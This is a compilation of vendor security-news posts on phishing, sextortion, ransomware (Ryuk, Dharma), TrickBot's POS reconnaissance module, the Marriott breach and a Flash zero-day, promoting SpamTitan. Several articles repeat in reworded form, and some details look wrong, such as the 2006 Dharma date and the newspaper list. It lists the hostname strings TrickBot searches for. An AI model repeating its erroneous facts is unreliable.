Homebuyers and Sellers Targeted ub Solicitor Email Scam

Home purchasers and real estate agents in the United Kingdom and Ireland are being targeted by cybercriminals using a new solicitor email campaign. The scam, which includes mimicking a solicitor, is costing victims thousands. Additionally, there have some cases seen where cybercriminals are contacting solicitors emails claiming to be their clients and asking for changes in their bank details. Any pending transfers are then sent to the criminals’ accounts.

As funds for home purchases are sent to solicitors’ accounts before being shared with the sellers, if cybercriminals can amend the bank details for the transfers, the funds for the purchase will be paid straight into their bank accounts.

While email spoofing is not unusual, this solicitor email scam often includes the hacking of solicitors’ email accounts. Once access has been obtained, cybercriminals search for emails shared from buyers and sellers of homes to identify possible targets.  While the hacking of email accounts is taking place, there have also been instances where emails between buyers, sellers and their solicitors have been captured. When bank details for a transfer are sent, the hackers amend the bank information in the email to their own and then send the email on.

The solicitor email scam is sophisticated and communications are monitored until the crucial point in the purchasing process when a bank transfer is about to be completed. Since the possible rewards are considerable, cybercriminals are willing to invest the time and effort into the scam and be patient. Buyers, vendors and solicitors are well researched and the emails appear authentic.

This conveyancing scam has been on the rise in recent months and it has now become the most common cybercrime impacting the legal sector. The Law Society, a representative organization for solicitors in the UK, has issued a warning about the conveyancing scam due to an rising number of complaints, although it is currently unclear how many fraudulent transfers have been completed.

The simple way to prevent such a scam from being successful is to contact the homebuyer or seller before any transfer is made and to verbally confirm the bank details. Additionally policies can be developed requiring bank account information to only be sent via postal mail.

The Solicitors Regulation Authority has issued guidance that advises against the use of email for property transactions due to the potential for cybercriminals to intercept and spoof messages. Email may be simple, but with such large sums being transferred it pays to use an abundance of caution.

While this solicitor email scam has been seen in many places across the UK and Ireland, legal firms in the United States should also use caution.

Ryuk Ransomware Suspected in Newspaper Cyberattack

The end of 2018 has seen a major newspaper cyberattack take place in the United States that has disrupted production of several newspapers published by Tribune Publishing.

The attacks were malware-based and affected the Saturday editions of the Los Angeles Times, the San Diego Union-Tribune, the Chicago Tribune, the New York Times, the Wall Street Journal, and a number of others. The malware attack took place on Thursday, December 27, and caused major issues throughout Friday.

All of the impacted newspapers shared the same production platform, which was infiltrated by the malware infection. While the sort of malware used in the attack has not been publicly confirmed, several insiders at the Tribune have reported that the attack utilized Ryuk ransomware.

Ransomware is a type of malware that encrypts critical files stopping them from being accessed. The main goal of attackers is usually to obtain ransom payments in exchange for the keys to decrypt the encrypted files. It is also a regular occurrence for ransomware to be deployed after network access has been obtained and sensitive information has been stolen, either to mask a data breach or in an attempt to make an attack even more profitable. It is also not unknown for ransomware attacks to be carried out to cause disruption. It is thought that this newspaper cyberattack was conducted primarily to disable infrastructure.

The sort of ransomware used in an attack is usually easy to notice. After encrypting files, ransomware changes file extensions to an (often) unique extension. In this instance of Ryuk ransomware, extensions are changed to .ryk.

The Los Angeles Times has blamed threat actors based outside the United States, although it is  not clear which group was behind the cyberattacks. If the attack was carried out to disable infrastructure it is probable that this was a nation-state sponsored attack.

The first Ryuk ransomware cyberattacks took place in August. Three U.S. companies were attacked, and the attackers were paid a minimum of $640,000 for the keys to unlock the data. A review of the ransomware revealed it shared code with Hermes malware, which had previously been connected to the Lazarus Group – An APT group with links to North Korea.

While many ransomware campaigns utilized mass spamming tactics to spread the ransomware and infect as many end users as possible, the Ryuk ransomware attacks were much more targeted and involved major reconnaissance and extensive network mapping before the ransomware is finally deployed. As is the case with SamSam ransomware attacks, the campaign is carried out manually.

Several tactics are used to obtain access to networks, although earlier in 2018 a warning about Ryuk ransomware was issued by the U.S. Department of Health and Human Services (HHS) claiming email to be one of the main attack vectors, emphasising the importance of email security and end user training to help staff recognize email-based threats.

Threat of Exposure with Multiple Malware Infections Combined in Recent Sextortion Scams

Sextortion scams have been very popular with cybercriminals during 2018. A well written email and an email list are all that is needed for this to be successful. The latter can easily be bought almost nothing via darknet marketplaces and hacking forums. No expertise is required to run sextortion scams and as scammers’ Bitcoin wallets show, they are successful.

Many sextortion scams threaten to reveal a user’s online activities (pornography habits, dating/adultery site usage) to all their contacts and friends/family unless a payment is completed. Some of the recent sextortion scams have increased credibility by claiming to have users’ passwords. However, new sextortion scams have been discovered in the past few days that are using a different tactic to get users to pay the ransome.

The email template used in this scam is very like those in other recent sextortion scams. The scammers say that they have a video of the victim viewing adult content. The footage was captured through the victim’s webcam and has been spliced with screenshots of the content that was being looked at.

In the new campaign the email includes the user’s email account in the copy of the email, a password (most likely an old password accessed in a previous breach), and a hyperlink that the victim is encouraged to click to download the video that has been created and see what will soon be distributed via email and social media networks.

VIsiting the link in the video will trigger the downloading of a zip file. The compressed file includes a document including the text of the email along with the supposed video file. That video file is really an information stealer – the Azorult Trojan.

This sort of the scam is even more likely to be successful than past campaigns. Many individuals who receive a sextortion scam email will see know what it is: A mass email including an empty threat. However, the inclusion of a link to download a video could lead to many individuals download the file to find out if the threat is authentic .

If the zip file is downloaded and opened and the Azorult Trojan executed, it will quietly gather information from the user’s computer – similar information to what the hacker claims to have already obtained: Cookies from websites the user has seen, chat histories, files stored on the computer, and login information entered through browsers such as email account and bank details.

However, it doesn’t stop there. The Azorult Trojan will also install a secondary payload: GandCrab ransomware. Once information has been gathered, the user will have their personal files encrypted: Documents, spreadsheets, digital photos, databases, music, videos, and more. Recovery will depend on those files having been backed up somewhere else and not also encrypted by the ransomware. Aside from permanent file loss, the only other option will be to pay a sizeable ransom to decrypt the hacked files.

If the email was sent to a company email account, or a personal email account that was logged onto at work, files on the victim’s work computer will be encrypted. As a record of the original email will have been extracted on the device, the reason why the malware was downloaded will be made clear to the IT department.

The key to not being tricked is to ignore any threats sent using the email and never click links in the emails nor open unexpected email attachments.

Companies can tackle the threat by using cybersecurity solutions such as spam filters and web filters. The former stops the emails from being sent while the latter blocks access to sites that host malware.

Ryuk Ransomware Suspected in Newspaper Cyberattack

The final weekend of 2018 has seen a significant newspaper cyberattack in the United States that has disrupted production of several newspapers published by Tribune Publishing.

The attacks were malware-related and impacted the Saturday editions of the Los Angeles Times, the San Diego Union-Tribune, the Chicago Tribune, the New York Times, the Wall Street Journal, and others. The malware attack occurred on Thursday, December 27, and caused major issues throughout Friday.

All of the impacted newspapers shared the same production platform, which was disrupted by the malware infection. While the sort of malware used in the attack has not been publicly revealed, several insiders at the Tribune have reported that the attack involved Ryuk ransomware.

Ransomware is a sort of malware that encrypts critical files stopping them from being accessed. The main goal of hackers is normally to obtain ransom payments in exchange for the keys to decrypt the encrypted files. It is also typical for ransomware to be deployed after network access has been obtained and sensitive information has been stolen, either to mask a data breach or in an effort to make an attack even more profitable. It is also not unknown for ransomware attacks to be carried out to cause disruption. It is suspected that this newspaper cyberattack was conducted chiefly to disable infrastructure.

The sort of ransomware used in an attack is normally easy to identify. After encrypting files, ransomware changes file extensions to an (often) unique extension. In the case of Ryuk ransomware, extensions are amended to .ryk.

The Los Angeles Times has attributed it to threat actors based external to the United States, although it is unclear which group was behind the cyberattacks. If the attack was carried out to disable infrastructure it is probable that this was a nation-state sponsored attack.

The initial Ryuk ransomware cyberattacks happened in August. Three U.S. companies were hacked, and the attackers were paid at least $640,000 for the keys to unlock the data. An analysis of the ransomware showed it shared code with Hermes malware, which had previously been connected to the Lazarus Group – An APT group with links to North Korea.

While many ransomware campaigns used mass spamming tactics to share the ransomware and infect as many end users as possible, the Ryuk ransomware attacks were much more focused and involved considerable reconnaissance and extensive network mapping before the ransomware is finally sent out. As is the case with SamSam ransomware attacks, the campaign is run manually.

Several tactics are used to obtain access to networks, although earlier this year a warning about Ryuk ransomware was broadcasted by the U.S. Department of Health and Human Services saying that the email to be one of the main attack vectors, highlighting the importance of email security and end user training to help staff recognize email-based threats.

FTC Warning Netflix After Phishing Scam

A new Netflix phishing scam has been discovered that tries to trick Netflix subscribers into disclosing their login details and other sensitivedata such as Social Security numbers and bank account numbers.

This Netflix phishing scam is similar to others that have been seen over the past few months. A major campaign was discovered in October and another in November. The latest Netflix phishing scam confirms that the threat actors are now beginning large-scale phishing attacks on a monthly basis.

The number of recent Netflix scams and the scale of the campaigns has lead to the U.S. Federal Trade Commission (FTC) to issue a warning to increase awareness of the threat.

The latest campaign was first noticed by an officer in the Ohio Police Department. As with past campaigns, the hackers use a tried and tested method to get users to click on the link in the email – the threat of account closure due to issues with the user’s billing details.

In order to stop closure of the user’s Netflix account a link in the email must be clicked on. That will send the user to the Netflix site where login details and banking information must be entered. While the web page looks authentic, it is hosted on a domain controlled by the hackers. Any information entered on that web page will be accessed by the threat actors behind the scam.

The emails appear realistic and contain the correct logos and color schemes and are almost identical to the official emails shared with users by Netflix. Netflix also includes links in its emails, so unwary users may click without first checking the authenticity of the email.

FTC Warning Netflix After Phishing Scam

There are indications that the email is not what it seems. The email incorrectly begins “Hi Dear”; British English is used, even though the email is sent to U.S. citizens; the email is sent from a domain that is not used by Netflix; and the domain to which the email sends users is similarly suspect. However, the scam is sure to trick many users who fail to carefully review emails before taking any action.

Consumers need to use caution with email and should carefully review messages before responding, no matter how urgent the call for action is. It is a good idea to always visit a website directly by entering in the domain into the address bar of a web browser, rather than clicking a link in an email.

If the email is found to be a scam, it should be reported to the appropriate authorities in the country in which you live and also to the company the scammers are pretending to be. In the case of Netflix phishing scams, emails should be sent to phishing@netflix.com.

While this Netflix phishing scam aims for consumers, companies are also at risk. Many similar scams attempt to get users to part with business login credentials and bank account data. Businesses can reduce the risk of data and financial losses to phishing scams by making sure all members of the company, from the CEO down, are given regular security awareness guidance and are taught cybersecurity best practices and are made aware of the most recent threats.

An advanced spam filtering solution is also strongly advisable to ensure the vast majority of these scam emails are obstructed and do not reach inboxes. SpamTitan for instance, stops more than 99.9% of spam and phishing emails and 100% of known malware.

For additional information on anti-phishing solutions for companies, get in touch with the TitanHQ team today.

 

Digimine Malware Transforms Infected Devices into Cryptocurrency Miners

Digimine malware is a new danger that was first discovered from a campaign in South Korea; however, the attacks have now been witnessed worldwide.

Ransomware is still a popular tool that allows havers to get a quick payout, but increased awareness of the threat means more companies are being more careful. Ransomware security has been improved and frequent backups are made to ensure files can be recovered without meeting the ransom. Not only is it now much harder to infiltrate systems with ransomware, speedy detection means large-scale attacks on companies are stopped. It’s difficult to get a big payday and the ability to restore files from backups mean fewer groups are paying up.

The rise in popularity of cryptocurrency, and its rapid rise in value, have given cybercriminals with another lucrative chance. Rather than distribute ransomware, they are developing and sharing cryptocurrency miners. By infecting a computer with a cryptocurrency miner, hackers do not need to rely on a victim paying a ransom.

Instead of locking devices and encrypting files, malware is downloaded that starts mining (creating) the cryptocurrency Monero, a different option to Bitcoin. Mining cryptocurrency is the verification of cryptocurrency transactions for digital exchanges, which includes using computers to solve complex numeric problems. For verifying transactions, cryptocurrency miners earn coins, but cryptocurrency mining requires a great deal of processing power. To make it profitable, it must be carried out on an industrial scale.

The processing power of hundreds of thousands of devices would make the operation highly profitable for hackers, a fact that has certainly not been lost on the developers of Digimine malware.

Infection with Digimine malware will see the victim’s device impacted, as its processing power is being used up mining Monero. However, that is not all. The campaign sharing this malware variant works via Facebook Messenger, and infection can see the victim’s contacts targeted, and could potentially lead to the victim’s Facebook account being hijacked.

The Digimine malware campaign is being shared using the Desktop version of Facebook Messenger, through Google Chrome rather than the mobile app. Once a device is infected, if their Facebook account is set to login automatically, the malware will send links to the victim’s contacts. Clicking those links will lead to installation of the malware, the generation of more messages to contacts and more infections, building up an army of hijacked devices for mining Monero.

Infections were first discovered in South Korea; however, they have now shared throughout east and south-east Asia, and beyond to Vietnam, Thailand, Philippines, Azerbaijan, Ukraine, and Venezuela, according to Trend Micro.

A similar campaign has also been noticed by FortiGuard Labs. That campaign is being carried out by the actors behind the ransomware VenusLocker, who have similarly switched to Monero mining malware. That campaign also began in South Korea and is spreading rapidly. Rather than employ Facebook Messenger, the VenusLocker gang is using phishing emails.

Phishing emails for this campaign contain malicious email attachments that install the miner. One of the emails claims the victim’s details have been accidentally exposed in a data breach, with the attachment containing details of the attack and instructions to follow to address risk.

These attacks seem to mark a new trend and as ransomware defenses continue to get better it is likely that even more gangs will alter  tactics and change to cryptocurrency mining.

Gift Card Scams Warning Issued for Holiday Season

Giving gift vouchers as Christmas presents is always popular and this year is no exception. Many gift card-themed scams were detected over Thanksgiving weekend that offered free or cheap gift cards to lure online shoppers into parting with their credit card details.

2018 has seen a surge in business email compromise (BEC) style tactics, with emails seeming to have been sent from within a company. The emails purport to have been sent from the CEO (or another executive) asking for accounts and administration staff purchase gift cards for clients or requesting gift cards be purchased to be used for charitable donations.

To minimize the risk from gift card scams and other holiday-themed phishing emails, companies must ensure they have strong spam filtering technology in place to block the emails at source and prevent them from landing in inboxes.

Consumers can be tricked into parting with credit card details, but businesses too are in danger. Most of these campaigns are carried out in order to gain access to login credentials or are used to install malware. If an end user responds to such a scam while at work, it is their employer that will be hit with the cost of being hacked.

2018 has seen many businesses targeted with gift card scams. The latest reports from Proofpoint suggest that out of the organizations that have been targeted with email fraud attacks, almost 16% had witnessed a gift card-themed attack: Up from 11% in Q2, 2018.

Many corporations businesses have Office 365 installed, but even Microsoft’s anti-phishing security has allowed phishing emails to slip through the net, especially at businesses that have not paid extra for advanced phishing protection. Even with the advanced anti-phishing security measures, emails still make it past Microsoft’s filters.

To obstruct these malicious messages, an advanced third-party spam filter is necessary.

Office 365 Phishing Emails Look like as Non-Delivery Alerts

A new phishing campaign was discovered by ISC Handler Xavier Mertens and the campaign seems to still be active.

The phishing emails look very like legitimate Office 365 non-delivery alerts and include Office 365 branding. As is the case with official non-delivery alerts, the user is warned that messages have not been delivered and told that action is required.

The Office 365 phishing emails state that “Microsoft found Several Undelivered Messages” and attributes the non-delivery to “Server Congestion.” The emails request the sender to retype the recipient’s email address and send the message again, although conveniently they include a Send Again button.

If users use the Send Again button, they will be sent to a website that closely resembles the official Office 365 website and includes a login box that has been auto-populated with the user’s email address.

If the password is typed, a JavaScript function sends both the email address and password to the hacker. The user will then be sent to the genuine outlook.office365.com website where they will be shown a real Office 365 login box.

While the Office 365 phishing emails and the website look genuine, there are signs that all is not what it seems. The emails are well composed and the sender’s email – postmaster@us.ibm.com – looks official but there is irregular capitalization of the warning message: Something that would not happen on an official Microsoft notification.

The clearest indication that this is a phishing scam is the domain to which users are sent if they click on the Send Again button. It is not an official Microsoft domain (agilones.com).

While the mistake in the email may be overlooked, users should notice the domain, although some users may proceed and type passwords as the login box is identical to the login on the official Microsoft site.

The campaign shows just how vital it is to carefully check every message before taking any action and to always review the domain before disclosing any sensitive data.

Hackers use Office 365 phishing emails because so many companies have signed up to use Office 365. Mass email campaigns therefore have a high chance of reaching an Outlook inbox. That said, it is easy to target office 365 users. A business that is using Office 365 broadcasts it using their public DNS MX records.

Firms can improve their resilience to phishing attacks through mandatory security awareness training for all workers. Employees should be told to always review messages carefully and should be guided how to identify phishing emails.

Companies should also ensure they have an advanced spam filtering solution set up. While Microsoft does offer anti-phishing protection for Office 365 through its Advanced Threat Protection (APT) offering, companies should consider using a third-party spam filtering solution with Office 365.

SpamTitan supplies superior protection against phishing and zero-day attacks, an area where APT is not proficient.

500 Million Guests IMpacted in Marriott Hotels Data Breach

A Marriott Hotels data breach has been discovered which could impact up to 500 million customer who previously made bookings at Starwood Hotels and Resorts. While the data breach is not the biggest ever reported – the 2013 Yahoo breach exposed up to  3 billion records – it is the second largest ever side by side with the 2014 Yahoo data breach that also impacted around half a billion users.

The Marriott data breach may not have impacted as many Internet users as the 2013 Yahoo data breach but due to the range of information stolen it is arguably more serious. Almost 173 million individuals have had their name, mailing address, email address stolen and around 327 million customers have had a combination of their name, address, phone number, email address, date of birth, gender, passport number, booking data, arrival and departure dates, and Starwood Guest Program (SPG) account numbers illegally taken. Additionally, Marriott also believes credit card details may have been illegally taken. While the credit card numbers were encrypted, Marriott cannot outright confirm whether the two pieces of data required to decrypt the credit card numbers was also taken by the hacker.

Along with to past guests at Starwood Hotels and Resorts and Starwood-branded timeshare properties, guests at Sheraton Hotels & Resorts, Westin Hotels & Resorts, W Hotels, St. Regis, Aloft Hotels, Element Hotels, The Luxury Collection, Tribute Portfolio, Le Méridien Hotels & Resorts, and Four Points by Sheraton have been infiltrated, along with guests at Design Hotels that registered for the SPG program.

The data breach was discovered by Marriott on September 8, 2018, following an attempt by an unauthorized person to access the Starwood database. The investigation showed that the cybercriminal behind the attack first gained access to the Starwood database in 2014. It is currently not public knowledge how access to the database was obtained.

The Marriott hotels data breach is extremely serious and will prove massively expensive for the hotel group. Marriott has already offered U.S. based victims free enrollment in WebWatcher, has paid for third party experts to review and help address the data breach, and the hotel group will be strengthening its security and phasing out Starwood databases.

Even though the Marriott hotels data breach has only just been made public, two class action lawsuits have already been filed. One of the lawsuits seeks damages totaling $12.5 billion – $25 per person impacted.

There is also the chance that a E.U. General Data Protection Regulation (GDPR) fine. Fines of up to €20 million can be sanctioned, or 4% of global annual revenue, whichever is greater. That could place Marriott at risk of a $916 million (€807 million) penalty. The UK’s Information Commissioner’s Office – the GDPR supervisory authority in the UK – has been made aware of the breach and is making enquiries.

Danger of Marriott Data Breach Related Phishing Attacks

A phishing attack has sent email notifications have been shared with to those impacted by the breach by Marriott. They were sent from the domain: email-marriott.com. Rendition Infosec/FireEye researchers bought the domains email-marriot.com and email.mariott.com just after after the announcement to keep them out of the hands of hackers. Other similar domains may be bought up by less scrupulous individuals to be used for phishing attacks.

A breach of this extent is also ideal for speculative phishing attempts that spoof the email domain owen by Marriott. Mass email campaigns will likely to be shared randomly in the hope that they will reach breach victims or individuals that have stayed at a Marriott hotel or one of its associated brands on a previous occasion.

 

TrickBot Malware Updated with POS Data Stealing Capabilities

A never before seen module has been added to TrickBot malware that implements point-of-sale (POS) data collection functionality

TrickBot is a modular malware that is being actively created. In early November, TrickBot was updated with a password stealing capability, but the most recent update has made it even more dangerous, especially for hotels, retail outlets, and restaurants: Businesses that process large amounts of card payments.

The new module was discovered by security experts at Trend Micro who note that, at present, the module is not being deployed to record POS data such as credit/debit card details. At present, the new TrickBot malware module is only gathering data about whether an infected device is part of a network that supports POS services and the types of POS systems in use. The experts have not yet discovered how the POS information will be used, but it is highly probable that the module is being used for reconnaissance. Once targets with networks supporting POS systems have been selected, they will likely be subjected to further intrusions.

The new module, titled psfin32, is like a previous network domain harvesting module, but has been developed specifically to identify POS-related terms from domain controllers and basic accounts. The module achieves this by deploying LDAP queries to Active Directory Services which search for a dnsHostName that contains strings such as ‘pos’, ‘retail’, ‘store’, ‘micros’, ‘cash’, ‘reg’, ‘aloha’, ‘lane’, ‘boh’, and ‘term.’

The timing of the update, so near to the holiday period, implies that the threat actors are planning to take advantage of the busy holiday trade and are gathering as much information as possible before the module is used to collect POS data.

The recent updates to TrickBot malware have come along with a malicious spam email campaign (identified by Brad Duncan) which is focusing on companies in the United States. The malspam campaign uses Word documents containing malicious macros that install the TrickBot binary.

Securing from TrickBot and other data stealing malware requires a defense-in-depth approach to cybersecurity. The main attack way that threat actors use TrickBot is spam email, so it is essential for an advanced anti-spam solution to be deployed to stop malicious messages from being delivered to end users’ inboxes. End user training is also important to ensure employees are made aware of the danger of opening emails from unknown senders, launching suspicious email attachments, and visiting hyperlinks in those messages.

Antivirus solutions and endpoint security measures should also be used to identify and quarantine potentially malicious files in case malware infiltrated databases successfully.

How to Strengthen the Office 365 Spam Filter

Office 365 has many advantages over competing software, so it is no shock that it is proving so popular with businesses, but one typical complaint is the number of spam and malicious emails that get through Microsoft’s defenses. If you have an issue with spam and phishing emails, there is an easy answer to enhance the Office 365 spam filter.

Office 365 Email Security

Over 135 million commercial users are now on Office 365. Unfortunately, the popularity of Office 365 has made it the focus of hackers. Microsoft has been proactively implementing measures to improve the Office 365 spam filter to make it more effective at blocking spam and phishing efforts. Office 365 phishing protections have been enhanced and more malicious emails are now being prevented; however, even with the recent anti-phish enhancements, many businesses still have to address spam, phishing emails, and other dangerous messages.

Companies using Office 365 as a hosted email solution are likely to have their email filtered using Exchange Online protection or EOP. EOP does provide a good level of protection and blocks spam, phishing emails, and malware. Osterman Research stated that EOP cuts out 100% of known malware and blocks 99% of spam email but struggles with the last 1%. Many companies have found that EOP blocks basic phishing attacks but comes up short at blocking more sophisticated email threats such as spear phishing and advanced persistent threats.

To strengthen the Office 365 spam filter, you should upgrade to Advanced Threat Protection, the second level of security offered with Office 365. The level of security is much better, although Advanced Threat Protection cannot identify zero-day threats and falls short of many third-party solutions on preventing other advanced threats. A SE Labs study in the summer of 2017 found that even with the extra level of protection, which is only available in the Office 365 E5 license tier, protection only ranked in the low-middle of the market.

The number of cases of hackers targeting vulnerabilities in Office 365 and the volume of direct attacks on Office 365 users has seen an rising number of businesses looking for a way to improve the Office 365 spam filter further.

Companies that want to further strengthen the Office 365 spam filter (and those looking for an Office 365 Advanced Threat Protection alternative) need to think about implementing a third-party anti-spam solution.

Luckily, there is a solution that will not only enhance Office 365 spam filtering, it is quick and easy to put in place, needs no software installations, and no hardware purchases are required. In fact, it can be implemented, configured, and be up and running quickly.

SpamTitan is a strong cloud-based email security solution that has been created to provide superior security against spam, phishing, malware, zero-day attacks, and data loss through email.

As opposed to Office 365, SpamTitan uses predictive measures such as Bayesian analysis, machine learning, and heuristics to block zero-day attacks, advanced persistent dangers, new malware variants, and new spear phishing methods.

SpamTitan reviews email headers, analyzes domains, and scans email content to spot phishing threats. Embedded hyperlinks, including shortened URLs, are reviewed in real time and subjected to URL multiple reputation checks, while dual antivirus engines scan and block 100% of known malware.

SpamTitan also uses data loss prevention tools for emails and attachments, which are not available with EOP. Users can establish tags for keywords and data elements such as Social Security numbers to secure against theft by insiders. SpamTitan also acts as a backup for your mail server to ensure business continuity.

With SpamTitan you get a higher level of security from spam and malicious emails, a higher spam catch rate (over 99.9%), improved granularity, better control over outbound email, and better business continuity protections.

If you have changed to Office 365 yet are still having issues with spam, phishing, and other malicious emails or if you are an MSP that wants to offer clients enhanced Office 365 email security, get in touch the TitanHQ team today.

The TitanHQ team can schedule a product demonstration and assist you putting SpamTitan through the paces in your own environment in a no-obligation free trial.

POS Data Stealing Capabilities Added to TrickBot Malware

A new module has been attached to TrickBot malware that allows point-of-sale (POS) data collection capabilities.

TrickBot is a modular malware that is being developed. In early November, TrickBot was refreshed with with a password stealing module, but the latest update has made it even more dangerous, mostly for hotels, retail outlets, and restaurants: Companies that process large volumes of card payments.

The new module was discovered by security experts at Trend Micro who note that, at present, the module is not being used to capture POS data such as credit/debit card numbers. Currently, the new TrickBot malware module is only gathering data about whether an infected device is part of a network that supports POS services and the types of POS systems implemented. The experts have not yet determined how the POS information will be used, but it is highly likely that the module is being used for intelligence. Once targets with networks supporting POS systems have been discovered, they will likely be subjected to further intrusions.

The new module, labelled psfin32, is like a previous network domain harvesting module, but has been developed specifically to spot POS-related terms from domain controllers and basic accounts. The module achieves this by using LDAP queries to Active Directory Services which search for a dnsHostName that includes strings such as ‘pos’, ‘retail’, ‘store’, ‘micros’, ‘cash’, ‘reg’, ‘aloha’, ‘lane’, ‘boh’, and ‘term.’

The timing of the update suggests the threat actors are planning to use the increase in holiday trade and are gathering as much data as possible before the module is used to gather POS data.

The recent updates to TrickBot malware have been accompanied by a malicious spam email campaign (discovered by Brad Duncan) which is targeting companies in the United States. The malspam campaign uses Word documents including malicious macros that download the TrickBot binary.

Protecting against TrickBot and other data stealing malware requires a defense-in-depth approach to cybersecurity. The main attack vector used by the threat actors to blame TrickBot is spam email, so it is vital for an advanced anti-spam solution to be deployed to stop malicious messages from being sent to end users’ inboxes. End user training is also important to ensure employees are made aware of the danger of opening emails from unknown senders, launching suspicious email attachments, and clicking hyperlinks in those emails.

Antivirus solutions and endpoint security measures should also be deployed to identify and quarantine potentially malicious files in case malware makes it past perimeter security.

New Variant of Dharma Ransomware Discovered

A new Dharma ransomware variant has been created that is currently evading detection by most of antivirus engines.

Heimdal Security say that the most recent Dharma ransomware variant captured by its researchers was only identified as malware by one of the 53 AV engines on VirusTotal.

Dharma ransomware (also known as CrySiS) first was seen in 2006 and is still being developed. This year, many new Dharma ransomware variants have been made available, each using new file extensions for encrypted files (.bip, .xxxxx, .like, java, .arrow, .gamma, .arena, .betta, and .tron to name but a few). In the past two months alone four new Dharma ransomware variants have been discovered.

The threat actors to blame for Dharma ransomware have claimed many victims in recent months. Successful attacks have been seen recently by Altus Baytown Hospital in Texas, the Arran brewery in Scotland, and the port of San Diego.

While free decryptors for Dharma ransomware have been created, the constant evolution of this ransomware threat rapidly renders these decryptors obsolete.  Infection with the most recent variants of the ransomware threat only give victims three options: pay a sizeable ransom to recover files, restore files from backups, or face permanent file loss.

The latter is not a solution given the extent of files that are encrypted. Restoring files from backups is not always an option as Dharma ransomware can also encrypt backup files and can erase shadow copies. Payment of a ransom is not a solution as there is no guarantee that files can or will be decrypted.

Safeguarding against ransomware attacks requires a combination of policies, processes, and cybersecurity solutions. Dharma ransomware attacks are mostly carried out via two attack vectors: The exploitation of Remote Desktop protocol (RDP) and via email malspam campaigns.

The most recent Dharma ransomware variant attacks involve an executable file being sent using a .NET file and HTA file. Infections happen using RDP-enabled endpoints using brute force attempts to guess passwords. Once the password is obtained, the malicious payload is activated.

While it is not exactly obvious how the Arran brewery attack happened, a phishing attack is suspected. Phishing emails had been received just before file encryption. Arran Brewery’s managing director Gerald Michaluk said: “We cannot be 100 percent sure that this was the vector that infection occurred through, but the timing seems to be more than coincidental”.

To safeguard against RDP attacks, RDP should be disabled unless it is absolutely necessary. If RDP is a requirement, access should only be possible through a VPN and strong passwords should be established. Rate limiting on login attempts should be set to block login attempts after a set number of failures.

Naturally, good backup policies are vital. They will ensure that file recovery is possible without meeting a ransom. Multiple copies of backups should be made with one copy held securely off site.

To safeguard against email-based attacks, an advanced spam filter is needed. Spam filters that rely on AV engines may not notice the latest ransomware variants. Advanced analyses of incoming messages are vital.

SpamTitan can enhance protection for businesses through combination of two AV engines and predictive techniques to prevent new types of malware whose signatures have not yet been installed on AV engines.

For more information on SpamTitan and safeguarding your email gateway from ransomware attacks and other threats, contact TitanHQ’s security experts today.

Flash Player Vulnerability Being Actively Exploited via Spear Phishing Campaign

Adobe has released an unscheduled update to correct vulnerabilities in Adobe Flash Player, including a zero-day flaw that is currently being targeted in the wild by an APT threat group on targets in Russia. One target was a Russian healthcare center that supplies medical and cosmetic surgery services to high level civil servants of the Russian Federation.

The zero-day flaw is a use-after-free weakness – CVE-2018-15982 – which enables arbitrary code execution and privilege execution in Flash Player. A malicious Flash object operates malicious code on a victim’s computer which gives command line access to the system.

The vulnerability was noticed by security researchers at Gigamon ATR who reported the vulnerability to Adobe on November 29. Researchers at Qihoo 360 discovered a spear phishing campaign that is being used to send a malicious document and linked files that exploit the weakness. The document used in the campaign was a forged staff questionnaire.

The emails included a .rar compressed file attachment which included a Word document, the vulnerability, and the payload. If the .rar file is unpacked and the document viewed, the user is shown a warning that the document may damage the computer. If the content is activated, a malicious command is run which extracts and initiates the payload – a Windows executable file named backup.exe that is hidden as an NVIDIA Control Panel application. Backup.exe acts as a backdoor into a system. The malicious payload gathers system data which is sent back to the hackers via HTTP POST. The payload also downloads and runs shell code on the infected device.

Qihoo 360 researchers have labelled the campaign Operation Poison Needles due to the identified target being a healthcare center. While the attack seems to be politically motivated and highly targeted, now that details of the vulnerability have been made public it is likely that other threat groups will use exploits for the vulnerability in more and more attacks.

It is therefore vital for companies that have Flash Player installed on some of their devices to update to the most recent version of the software as soon as they can. That said, removing Flash Player, if it is not required, is a better option given the number of vulnerabilities that are identified in the software each month.

The vulnerability is Flash Player 31.0.0.153 and all previous versions. Adobe has addressed the flaw together with a DLL hijacking vulnerability in version 32.0.0.101.

Starbucks Porn Filter to Finally be Implemented in 2019

A Starbucks porn filter will be brought in 2019 to stop adult content from being accessed by customers hooked up to the chain’s free WiFi network.

It has taken a considerable amount of time for the Starbucks porn filter to be applied. In 2016, the coffee shop chain agreed to put in place a WiFi filtering solution following a campaign from the internet safety advocacy group Enough is Enough, but two years on and a Starbucks porn filter has only been applied in the UK.

Companies Pressured to Put in Place WiFi Filters to Block Porn

Enough is Enough released its Porn Free WiFi campaign – now renamed the SAFE WiFi campaign – to pressure companies that offer free WiFi to customers to apply WiFi filters to prevent access to adult content. In 2016, over 50,000 petitions were sent to the CEO’s of Starbucks and McDonalds urging them to apply WiFi filters and take the lead in preventing access to pornography and child porn on their WiFi networks.

After petitioning McDonald’s, the global restaurant chain took swift action and rolled out a WiFi filter across its 14,000 restaurants. However, Starbucks has been slow to take steps. After the McDonalds announcement in 2016, Starbucks agreed to roll out a WiFi filter once it had determined how to limit access to unacceptable content without involuntarily blocking unintended content. Until the Starbucks porn filter was applied, the coffee shop chain said it would reserve the right to stop any behavior that negatively impacted the customer experience, including activities on its free WiFi network.

The apparent lack of action lead Enough is Enough to increase the heat on Starbucks. On November 26, 2018, Enough is Enough president and CEO, Donna Rice Hughes, issued a fresh call for a Starbucks porn filter to be put in place and for the coffee chain to follow through in its 2016 promise. Rice Hughes also called for the public to sign a new petition calling for the Starbucks porn filter to finally be put in place.

Starbucks Porn Filter to Be Launched in All Regions in 2019

Starbucks has responded to Enough is Enough, via Business Insider, stating that it has been testing a variety of WiFi filtering solutions and has identified one that meets its needs. The Starbucks porn filter will be released across all its cafes in 2019.

All companies that offer free WiFi to their customers have a responsibility to ensure that their networks cannot be abused and remain ‘family-friendly.’ It is inevitable that some individuals will abuse the free access and flaunt policies on acceptable use. A technical solution is therefore necessary to enforce those policies.

While Enough is Enough is focused on ensuring adult content is prevented, there are other benefits of WiFi filtering. A WiFi filter protects customers from malware downloads and can stop them accessing phishing websites. All manner of egregious and illegal content can be restricted.

WiFi filters can also help companies conserve bandwidth to make sure that all customers can log on to the Internet and enjoy reasonable speeds.

TitanHQ has long been a supporter of WiFi filtering for public WiFi hotspots and has developed WebTitan Cloud for WiFi to allow businesses to easily restrick access to unacceptable and illegal web content on WiFi networks.

